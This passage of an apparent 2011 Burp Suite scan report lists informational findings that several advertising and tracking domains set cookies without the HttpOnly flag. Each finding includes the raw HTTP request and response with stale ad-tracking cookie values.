<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...

17.348. http://optimized-by.rubiconproject.com/a/7665/13236/25159-2.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7665/13236/25159-2.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7665/13236/25159-2.js?cb=0.7269156167749316 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_1994=6ch47d7o8wtv; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_2081=CA-00000000456885722; lm="28 Jan 2011 14:48:45 GMT"; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; put_1185=3011330574290390485; put_1986=4760492999213801733; put_2132=D8DB51BF08484217F5D14AB47F4002AD; put_2100=usr3fd748acf5bcab14; put_1197=3297869551067506954; csi15=3182054.js^1^1296236268^1296236268&763123.js^1^1296236268^1296236268&618560.js^1^1296236263^1296236263&3174529.js^3^1296226115^1296232920&3168345.js^2^1296232903^1296232919&3178300.js^1^1296232904^1296232904&3187311.js^2^1296226114^1296226127&3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; khaos=GIPAEQ2D-C-IOYY; rpb=4894%3D1%264939%3D1%262399%3D1%263615%3D1%264940%3D1%265574%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%264212%3D1%266286%3D1%266073%3D1%264214%3D1%263612%3D1%262372%3D1%262196%3D1%262111%3D1%262494%3D1%262189%3D1%263169%3D1%262374%3D1; ruid=154d290e46adc1d6f373dd09^6^1296308324^2915161843; ses2=7531^1; csi2=328960.js^1^1296308415^1296308415&3174527.js^6^1296226121^1296232923&3138805.js^3^1296224077^1296232921&3178295.js^1^1296226112^1296226112; ses9=9320^1&7531^1; csi9=3151064.js^1^1296308448^1296308448&618554.js^1^1296308324^1296308324; cd=false

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:29:43 GMT
Server: RAS/1.3 (Unix)
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: ruid=154d290e46adc1d6f373dd09^7^1296350983^2915161843; expires=Sat, 30-Apr-2011 01:29:43 GMT; max-age=7776000; path=/; domain=.rubiconproject.com;
Set-Cookie: rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; path=/; domain=.rubiconproject.com;
Set-Cookie: rdk=7665/13236; expires=Sun, 30-Jan-2011 02:29:43 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Sun, 30-Jan-2011 02:29:43 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=7531^1&13236^1; expires=Mon, 31-Jan-2011 05:59:59 GMT; max-age=109816; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3186999.js^1^1296350983^1296350983&328960.js^1^1296308415^1296308415; expires=Sun, 06-Feb-2011 01:29:43 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2402

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3186999"
...[SNIP]...

17.349. http://pix04.revsci.net/A06546/b3/0/3/1003161/543149170.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /A06546/b3/0/3/1003161/543149170.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /A06546/b3/0/3/1003161/543149170.js HTTP/1.1
Host: pix04.revsci.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: udm_0=MLv3NSMJaSpn3g1FgecyID/YTWjxcmn+jRwDtK6yKGSqLiDCbz2rscDhNkPJfBSzlL4dxsqrgwGwTcU0yVOl93x0bsnVOXBsYOd//QgpPolrbS4+Nw8pZmwuLu/BFF7QsvnGgRit9IQdrMe68QJG+xARlbfeqCut/4QAwRNJQR/XlVBysq/jrFHdWb+7tcucPJDdqOzrQiKJQMWveoQqCvYVuCItXlfGZkoyggle3az/HvQUB76nGMvM6aK+iHbgmmWUZ7vTesbzpgDUtcCDBy1OP8b/EWRyH4uNf3IiIEN7uN/unTN7wj+d3aJN+S/uAmGvQTMbx92ct+tNW/fLsANU3MGbWx9PWZB8OCJZ1Jjg7/r6sb6HKhDbfUhULrzcm41SNIyqo/UPwJQztEuuuiLIririPZSp5K8cha5iUvwBePNVNuTjmqDgmws5XPyigl5UM6qcPfeQiBpeVKzEw1/Vq2msHxmzpfSHKTD8e90Ps1HEYrkFOPic6v6njtkrtHLHDXb971WO7HB/0bEjCaOTtCC9kXesDSj90s8MzA++V01FrJ3dgnIeesBl0xJxLJRIU5VhoyLHXgkVIX37uD6r7oH0cMDf2K7Eaupks0wRDpggvT5EFH8JlWlBVNXM79nOtYm2WHhGrjCqhrat51GMQL5cfCHYT3mZFcmfFrSHZGkbkOFSTPWvaB2MEzzvZmVxJjOFYAeGcJdekdsk/yPfbRlXWhTqBzXFxnBdkAVVgrh2H6Jj/iMj22RD7lrrnu0tLor5OZ8cn6Ym51edHhgpShQyzLU9V8EG0n7wfEQLBINnz6LPBtX6+8SS5RQrtiF/eGzW8dYK23z34XahxqULrJN5RQMIu5VTy7/Ghw6qjoZ/sD5mTNDI+RcSBdg0d0+9f7uCZnkisLc6SVCJ5iUT5F9LuU/+AfJo2l8alr6bDLTj2kS4UGIT3Ac5OdkWIBI/wfXDydN6T1e3I63W6L/h9vQpbrgZAA/KjPp2Yq4gjVuQsW3u4AbuNaZJ51egQSvC1zJn+6C/ibzxCxGnJ3bIiVn23LgeutuBiHfVN+6fwIGIhfLz3WmndFELqStWoNJq+LCRtr5BMYrCX5JQu49xYlIiFztxwRQPG4DDLowZx9qjXQOR8xq6IWWic6t7idKbOc4DlCW/3azG8wjO4MNyD2fCSb0csZSqhgdPg8/egWktt/TP2cZ4dhF+JU3+tmQ7e5p2; rsi_segs_1000000=pUPFeUOFbwIUllNab/cemd1+k3oMcz9wc4mVCGdkHCrwWmaePNeODkXbq2K+tQyP8LR5ylRhRNgirDTpoIcrk+cIkXXfbtlOSmsfU1UZkujEsLbnRvi1mdYlE9GqFbJhJJ6Bxw2/6Vp1FAEA8dbQxknNO77OBB0EhWDzhf+pHpllJGeHUdUpo++k4d+c5bY1Qvx4d5W47BVKBDhTd7AdL12fLl6zFZaTu+rTxdLhlftv2v2MUDe2Y91CvpzYDUg3O3napeeKccCImESkDVzox9S9Nh2WBZtMXhJbvQq6; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=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; 
rtc_0=MLsvsSNONj5rJ5GcjT68k50qPXPDyERqefZOna8MpC1/MWJCA4xH8SpWANL7YB35qSS2yy33RhKjqBIMAOt8NoSzFqWLk9C/EJW8fOfXalWBSLot+iDRScbnkWzcs1/5J9Rx2c+G+oM0+jiIjwnzOTsWVXIT3GJP2zqS8f5YK8LGidZZncaP6FyDewZOD9OqSXj0NADF7466hKYsChUFHUNSff/3W9Ex/u0KFSUhMg3pTqYAo5WxWU01Utx+qoxPJcgytEBIWsioEX18AfchTIZJmLQAEZ/GX1LD0ubdgUVJbjy56rZyaUyBYLpIwqtbgx/90WrLhotV4hGILddtKL521RDHO3KguvCmAbp7tNQv1TNIkXJQw69MkhHauf14LG4Jl+6S91aCeKmyWq/ifshFreMNqI1pwfaCUIgSDqQR71PQ5uSSjfqXxM5HAKaUJwTu5OY=; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d69b449&0&&4d43b3c1&4c5cffb70704da9ab1f721e8ae18383d; Domain=.revsci.net; Expires=Sun, 27-Feb-2011 02:17:45 GMT; Path=/
X-Proc-ms: 11
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 733
Date: Sun, 30 Jan 2011 02:17:45 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['A06546_10827','H05525_10833','A06546_50376'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[
...[SNIP]...

17.350. http://pix04.revsci.net/A06546/b3/0/3/1003161/543149170.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /A06546/b3/0/3/1003161/543149170.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A06546/b3/0/3/1003161/543149170.js?D=DM_LOC%3Dhttp%253A%252F%252Fmsn.whitepages.com%252F%253F_rsiL%253D0%26DM_CAT%3DWhitepages%2520Homepage%26DM_REF%3Dhttp%253A%252F%252Fburp%252Fshow%252F15%26DM_EOM%3D1&C=A06546 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; rsi_segs_1000000=pUPFek+FKAIQ1kNbPCvXupu0dYRBBw10Qnf0xWQrS0BEV6VWEHVfSnhpJVW5Lutkv1AyDl7qxTuCJgKvTPglemXPFwXO/l9yiURcsiUamtWcEzbP2TrfBHkE6to317EuNk9+iXSG4DvY1g/WBQ7a8qgeGg5oDbhmSSc5VoUxIBgQS/K4Q3yRHjMx2E0L81Hpbsggz0uWpYjffiAisiXmERkc/1665y5ZjB1b5STeJ4Pw4InvEOIoEyC78lpwlYmIydTi5ad2s/hOwYyScvdENQ==; rtc_0=MLsvrtMvcS5nJQFEBOfISErx+c1JMM1lDAyWHQIjVfvuhWI24GqMWoF/oWJdVrkRObfmVAFC7D5kNDpA7XLOLyXT7eHooUJSyInu6zq77Ti1xy5n8Qg3XeEe+tnQc/qNK5SeIuNm9OiemNvg0uPlUbqN72Pj+9+Ar1bDVU7hjepOYqJdor+NnFmpdNvQfxTIoHitxigPuoiTVzaqoruXF69raqbuvDx9NSxO37yG1cXJQrgqNEJYL+2aRbtieJoq+tCHUpTw8bYVhr5p0THE5yB09PMYdBM/swb+JMOM7Snl6/uAVD2lwzGGjsLQzOAv+uBqR8jCXnxVhvn7VWB6iHsq1LcapkedsIN3gi/o04igBj2IKrYeTcLWm4dMlDT7lMD1xWUmpmHTEibAOge6OBtRCgwHRB4CstW16Jo3oxnT; rsi_us_1000000=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; udm_0=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFeU+FbxIQlVNYvPsemd1+k2RVNJ84PixU5WRr0r6Qywadg+otlqGxKr7OS2Tzwu4/In5EGUAqJWLB0DOxgg/CuOXW8YP+vFRmMjOLHe04PzvmT/vqkZ5VMxzqzXrrENqLroKKf6k341pRrKSaywJJTHEgZhWrYFVTKHcr5jXkc94hOIoKl1bm0QymdMHOj+nrIpL/JfZ7r/Uig5xRzUD4U0LWwa2N+zYoP8sqyQqHnKJCkHB+/FJZtglBhjUBpyF9uVhwdrX8M1fM90HAYCHrIlO/SjgkS/Jvwa4v7A==; Domain=.revsci.net; Expires=Mon, 30-Jan-2012 01:29:45 GMT; Path=/
Set-Cookie: NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; Domain=.revsci.net; Expires=Sun, 27-Feb-2011 01:29:45 GMT; Path=/
Set-Cookie: rtc_0=MLsvsSNONj5rJ5GcjT68k50qPXPDyERqefZOna8MpC1/MWJCA4xH8SpWANL7YB35qSS2yy33RhKjqBIMAOt8NoSzFqWLk9C/EJW8fOfXalWBSLot+iDRScbnkWzcs1/5J9Rx2c+G+oM0+jiIjwnzOTsWVXIT3GJP2zqS8f5YK8LGidZZncaP6FyDewZOD9OqSXj0NADF7466hKYsChUFHUNSff/3W9Ex/u0KFSUhMg3pTqYAo5WxWU01Utx+qoxPJcgytEBIWsioEX18AfchTIZJmLQAEZ/GX1LD0ubdgUVJbjy56rZyaUyBYLpIwqtbgx/90WrLhotV4hGILddtKL521RDHO3KguvCmAbp7tNQv1TNIkXJQw69MkhHauf14LG4Jl+6S91aCeKmyWq/ifshFreMNqI1pwfaCUIgSDqQR71PQ5uSSjfqXxM5HAKaUJwTu5OY=; Domain=.revsci.net; Expires=Mon, 30-Jan-2012 01:29:45 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 733
Date: Sun, 30 Jan 2011 01:29:44 GMT

/* Vermont-12.4.0-1012 */
rsinetsegs=['A06546_10827','H05525_10833','A06546_50376'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[
...[SNIP]...

17.351. http://pix04.revsci.net/D08734/a1/0/0/0.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /D08734/a1/0/0/0.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEFlfd-sZ8CX6_Cz86QSvO_0&cver=1 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; udm_0=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; rsi_us_1000000=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; rsi_segs_1000000=pUPFeU+FbxIQlVNYvPsemd1+k2RVNJ84PixU5WRr0r6Qywadg+otlqGxKr7OS2Tzwu4/In5EGUAqJWLB0DOxgg/CuOXW8YP+vFRmMjOLHe04PzvmT/vqkZ5VMxzqzXrrENqLroKKf6k341pRrKSaywJJTHEgZhWrYFVTKHcr5jXkc94hOIoKl1bm0QymdMHOj+nrIpL/JfZ7r/Uig5xRzUD4U0LWwa2N+zYoP8sqyQqHnKJCkHB+/FJZtglBhjUBpyF9uVhwdrX8M1fM90HAYCHrIlO/SjgkS/Jvwa4v7A==; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLsvsSNONj5rJ5GcjT68k50qPXPDyERqefZOna8MpC1/MWJCA4xH8SpWANL7YB35qSS2yy33RhKjqBIMAOt8NoSzFqWLk9C/EJW8fOfXalWBSLot+iDRScbnkWzcs1/5J9Rx2c+G+oM0+jiIjwnzOTsWVXIT3GJP2zqS8f5YK8LGidZZncaP6FyDewZOD9OqSXj0NADF7466hKYsChUFHUNSff/3W9Ex/u0KFSUhMg3pTqYAo5WxWU01Utx+qoxPJcgytEBIWsioEX18AfchTIZJmLQAEZ/GX1LD0ubdgUVJbjy56rZyaUyBYLpIwqtbgx/90WrLhotV4hGILddtKL521RDHO3KguvCmAbp7tNQv1TNIkXJQw69MkhHauf14LG4Jl+6S91aCeKmyWq/ifshFreMNqI1pwfaCUIgSDqQR71PQ5uSSjfqXxM5HAKaUJwTu5OY=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFeUOFbwIUllNab/cemd1+k3oMcz9wc4mVCGdkHCrwWmaePNeODkXbq2K+tQyP8LR5ylRhRNgirDTpoIcrk+cIkXXfbtlOSmsfU1UZkujEsLbnRvi1mdYlE9GqFbJhJJ6Bxw2/6Vp1FAEA8dbQxknNO77OBB0EhWDzhf+pHpllJGeHUdUpo++k4d+c5bY1Qvx4d5W47BVKBDhTd7AdL12fLl6zFZaTu+rTxdLhlftv2v2MUDe2Y91CvpzYDUg3O3napeeKccCImESkDVzox9S9Nh2WBZtMXhJbvQq6; Domain=.revsci.net; Expires=Mon, 30-Jan-2012 01:30:06 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=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; Domain=.revsci.net; Expires=Mon, 30-Jan-2012 01:30:06 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Sun, 30 Jan 2011 01:30:06 GMT

GIF89a.............!.......,...........D..;

17.352. http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel/p-e4m3Yko6bFYVc.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/p-e4m3Yko6bFYVc.gif?labels=NewsAndReference,Entertainment HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4d21fad0-365c5-43e3d-97d7a; d=EHAAG6ANq0itiBDbz6HJXbIAAboBAfYFgfQAmtGkrxPyD5ELwXzlIG3R8gDChB0bohjR4QCJENoVz2kQ4QANEOECjRk_44OSDUKoTRMW4QsYEfopG3wRwQsRCFGx4QA9EAAiABcoSCVfgoGyODsR4Zoh

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: d=EBAAG6ANq0itiBDbz6HJXbIAAboBAfcFgZUAmtGkrxPyD5ELwXzlIG3R8gDChB0bohjR4QCJENoVz2kQ4QANEOECjRk_44OSDUKoTRMW4QsYEfopG3wRwQsRCFGx4QA9EAAiABcoSCVfgoGyODsR4Zoh; expires=Sat, 30-Apr-2011 01:29:45 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV"
Content-Type: image/gif
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 35
Date: Sun, 30 Jan 2011 01:29:45 GMT
Server: QS

GIF89a.......,.................D..;

17.353. http://ptsd.eyewonder.com/ewr

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ptsd.eyewonder.com
Path:   /ewr

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ewr?cid=20015042&versionid=3 HTTP/1.1
Host: ptsd.eyewonder.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ew=MDAwMTI5NjMzNTIzMjE4MTAwMDAyMDM3NzFfMTI5NjM1MDQ2MjU2MV8xMV9fXzA; Domain=.eyewonder.com; Expires=Sun, 27-Mar-2011 01:21:02 GMT; Path=/
Set-Cookie: ewroi=""; Domain=.eyewonder.com; Expires=Sun, 27-Mar-2011 01:21:02 GMT; Path=/
P3P: CP="NON DSP COR NID CURa PSAa PSDa OUR STP UNI COM NAV STA LOC OTC", policyref="http://pts.eyewonder.com/static/ew/w3c/p3p_eyewonder.xml"
gmtdiid: 8a8486852dd2373f012dd2d1a0311046
Content-Type: text/javascript;charset=US-ASCII
Content-Length: 325
Date: Sun, 30 Jan 2011 01:21:02 GMT
Connection: close

/* Created On: 1296350462561 */var ew20015042_dynamicAdModel={acid: 0,adid: 200927,eid: 20015042,tid: 0,emv: 4,uid: null,value: ''};document.writeln('<scr'+'ipt language="Javascript" id="ew20015042_wr
...[SNIP]...

17.354. http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64 HTTP/1.1
Host: r1-ads.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: F1=BcwvE1kAAAAAdVyCAEAAgEABAAAABAAAAUAAGAA; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; BASE=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!; ACID=Bc330012940999670074; GUID=MTI5NjMwODMzMjsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; 12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; A07L=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w; C2=H8LRNJpwIg02FzECdbdxMhwUwXMTI8Y4FzECYTexMhQ3gZMTIQTnGzECF2pxMhAohXMTIYZ4FzECKGexMhwohXMTIca4FzECiGexMhQshXMTwOYAM/ohjI7YCwAoGs0r1RQcKaQMGK2AI9YhqN53EkL3FHzgPXw6TVcVsumB/0mRjca7HIaWGBQrMew41ZYDkq1B6bjRNq6bDwWZGs6r4jQsMaEKwaHCW8oRo0I9IsfzFnysNiQQoaMT; ROLL=v5Q2H0MbU/zqUNH1h7d3T1ystuIiEaPHy4fCVadX/ASOjE6f+wnqYseyuA0vwlvFYFjqzjc8zqkwR3t+XXAr8QlWG4SSF/7N1Eja1YV2UmztMwbFznDUKtzd8HNCCLwX3RIWa/0nS8WT042H7E5JNtYzd2SZZdA!;

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Location: http://c
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 30 Jan 2011 18:08:28 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 125
Date: Sun, 30 Jan 2011 18:08:28 GMT
Connection: close
Set-Cookie: C2=ckaRNJpwIg02FsBCdbdBbgwUwXwGI8Y4FsBCYTeBbgQ3gZwGIQTnGsBCF2pBbgAohXwGIYZ4FsBCKGeBbgwohXwGIca4FsBCiGeBbgQshXwGwOIAM/oxxL7YCwAoGlxr1NQcKa0/GK2AI9Yx4M53EkL3FAwgPXw6TVAJsuWB/0mhxfa7GIaWG6crMaw41Z82kq1B6bjhbp6bDwWZGl3r4fQsMao9wa3BW8oh23I9HsfzFg/sNiQQoawGCKCC9mUBwB; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:28 GMT; path=/
